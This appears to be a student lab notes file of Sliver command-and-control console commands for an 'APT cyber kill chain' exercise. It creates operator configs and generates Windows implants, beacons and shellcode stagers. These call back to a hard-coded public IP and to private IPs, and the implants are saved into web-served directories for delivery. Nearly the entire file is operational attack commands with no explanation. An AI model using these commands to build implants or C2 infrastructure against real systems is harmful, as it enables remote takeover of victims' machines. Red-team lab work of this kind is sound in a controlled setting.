// active multiplayers mode
multiplayer

// create config file
new-operator --name 20120083 --lhost localhost --lport 31337 --save /home/kali/.sliver-client/configs
new-operator --name 20120083 --lhost 18.143.102.216 --lport 31337 --save ../client_config/20120083.cfg

mv ./tools/client_config/20120083_client.cfg /home/kali/.sliver-client/configs

// create implant sessions
generate --mtls 18.143.102.216:8080 --os windows --name session_00 --arch amd64 --format exe --save /var/www/apt_domain/sessions
generate beacon --mtls 18.143.102.216:8080 --os windows --arch amd64 --format exe --save /var/www/apt_domain/beacons --seconds 5 --jitter 3


generate --mtls 18.143.102.216:8080 --os windows --name session_00 --arch amd64 --format exe --save /var/www/html/sessions
generate beacon --mtls 18.143.102.216:8080 --os windows --arch amd64 --format exe --save /var/www/html/beacons --seconds 5 --jitter 3

new-operator --name huhu --lhost localhost --lport 31337 --save /home/kali/.sliver-client/configs

// create implant sessions
generate --mtls 192.168.216.14:8080 --os windows --arch amd64 --format exe --save /var/www/html
generate beacon --mtls 192.168.216.14:8080 --os windows --arch amd64 --format exe --save /var/www/html --seconds 5 --jitter 3

// stager
profiles new --mtls 18.143.102.216:8080 --skip-symbols --format shellcode --arch amd64 win64
stage-listener --url tcp://18.143.102.216:1234 --profile win64
jobs
generate stager --lhost 18.143.102.216 --lport 1234 --protocol tcp --arch amd64 --format c --save /var/www/html

profiles new --mtls 18.143.102.216:8080 --format shellcode win-shellcode
generate stager --lhost 10.0.149.9 --lport 1234 --protocol tcp --arch amd64 --format ps1 --save /tmp

20120078
20120083
20120116
20120176
20120313

kick-operator -n 20120078
kick-operator -n 20120083
kick-operator -n 20120116
kick-operator -n 20120176
kick-operator -n 20120313

sudo chmod -R +rX /var/www/apt_domain/beacons/

nano ./tools/sliver/client_configs/20120083_18.143.102.216.cfg

ls ./tools/sliver/client_configs
ls /var/www/apt_domain/configs
ls /home/kali/.sliver-client/configs

sliver-client import /home/kali/git-test/APT-Cyber-Kill-Chain//tools/sliver/client_configs/